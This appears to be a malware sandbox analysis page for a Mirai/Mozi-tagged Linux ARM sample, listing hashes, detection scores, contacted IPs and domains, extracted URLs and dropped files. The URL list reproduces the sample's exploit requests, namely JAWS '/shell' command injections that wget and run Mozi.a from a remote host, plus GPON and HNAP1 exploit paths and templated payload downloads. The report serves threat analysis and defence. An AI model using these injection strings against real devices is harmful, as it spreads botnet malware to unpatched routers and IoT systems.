nT7K5GG5km

Status: finished

Submission Time: 2021-05-01 20:23:58 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
402069
API (Web) ID:
706296
Analysis Started:

2021-05-01 20:23:58 +02:00
Analysis Finished:

2021-05-01 20:35:23 +02:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 39/60

Open Full Report

malicious

Score: 20/37

malicious

Score: 20/29

malicious

IPs

IP	Country	Detection
19.35.22.33	United States
93.203.255.9	Germany
24.159.133.235	United States
Click to see the 97 hidden entries
186.64.54.15	Argentina
173.80.87.48	United States
110.86.197.212	China
83.68.127.228	France
55.204.254.198	United States
40.96.198.202	United States
12.96.110.207	United States
72.24.210.73	United States
154.138.26.112	Egypt
46.42.169.51	Russian Federation
198.198.32.42	United States
8.171.95.12	Singapore
201.181.160.44	Argentina
69.150.69.116	United States
140.43.31.90	United States
67.168.47.89	United States
36.47.114.54	China
24.144.48.190	United States
97.23.253.187	United States
149.52.60.248	United States
195.254.187.23	unknown
101.244.33.33	China
141.57.194.108	Germany
175.3.12.174	China
164.31.27.58	Germany
168.44.159.27	United States
157.98.25.110	United States
218.34.211.21	Taiwan; Republic of China (ROC)
66.148.28.100	Canada
91.102.92.141	Denmark
93.45.184.9	Italy
27.219.87.4	China
135.48.205.7	United States
106.128.236.208	Japan
5.41.198.250	Saudi Arabia
166.183.247.157	United States
215.107.106.224	United States
39.189.171.124	China
173.134.223.176	United States
58.20.74.167	China
195.76.91.176	Spain
16.158.169.248	United States
85.110.95.80	Turkey
196.224.36.136	Tunisia
197.223.37.86	Egypt
88.103.196.15	Czech Republic
207.144.55.208	United States
17.103.12.181	United States
86.130.232.94	United Kingdom
166.120.240.93	Australia
213.121.103.4	United Kingdom
72.87.194.121	United States
32.119.200.236	United States
175.165.55.236	China
185.226.106.196	Spain
29.68.34.28	United States
122.107.18.193	Australia
190.61.180.10	Colombia
191.213.118.143	Brazil
155.117.48.151	United States
75.189.26.238	United States
162.48.192.209	United States
220.49.0.51	Japan
63.112.131.88	United States
74.73.218.101	United States
218.245.32.128	China
58.33.168.139	China
59.186.255.47	Korea Republic of
134.136.214.66	United States
62.146.28.116	Germany
43.216.7.248	Japan
92.10.113.236	United Kingdom
164.176.196.33	United States
50.83.208.186	United States
168.26.94.133	United States
32.227.55.20	United States
11.3.231.145	United States
103.58.197.248	unknown
72.68.142.193	United States
172.222.196.31	United States
125.15.133.201	Japan
111.253.169.172	Taiwan; Republic of China (ROC)
59.249.34.45	China
75.36.210.166	United States
39.167.82.179	China
181.148.98.93	Colombia
35.155.184.95	United States
73.109.81.199	United States
113.138.14.215	China
99.198.164.146	United States
113.202.99.35	China
113.178.195.53	Viet Nam
100.54.104.98	United States
72.208.107.184	United States
148.200.165.122	Netherlands
98.37.89.152	United States
86.249.71.23	France

Domains

Name	IP	Detection
dht.transmissionbt.com	87.98.162.88
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://127.0.0.1:80/GponForm/diag_Form?images/
http://179.40.62.87:80/HNAP1/
http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Click to see the 48 hidden entries
http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://204.232.228.51:80/HNAP1/
http://81.196.113.75:80/HNAP1/
http://104.124.230.135:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://166.88.13.234:80/HNAP1/
http://184.86.117.97:80/HNAP1/
http://45.148.37.237:80/HNAP1/
http://49.44.132.19:80/HNAP1/
http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.36.171.129:80/HNAP1/
http://123.110.194.55:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh
http://210.190.146.92:80/HNAP1/
http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.3.84.96:80/HNAP1/
http://www.alsa-project.org
http://%s:%d/Mozi.m;$
http://127.0.0.1sendcmd
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.a;chmod
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.alsa-project.org.
http://HTTP/1.1
http://schemas.xmlsoap.org/soap/envelope//
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://www.pastebin.ca/upload.php
http://%s:%d/Mozi.m
http://schemas.xmlsoap.org/soap/encoding/
http://pastebin.ca)
http://www.alsa-project.org/cardinfo-db/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://114.204.63.176:49152/soap.cgi?service=WANIPConn1
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

nT7K5GG5km

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

nT7K5GG5km Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

nT7K5GG5km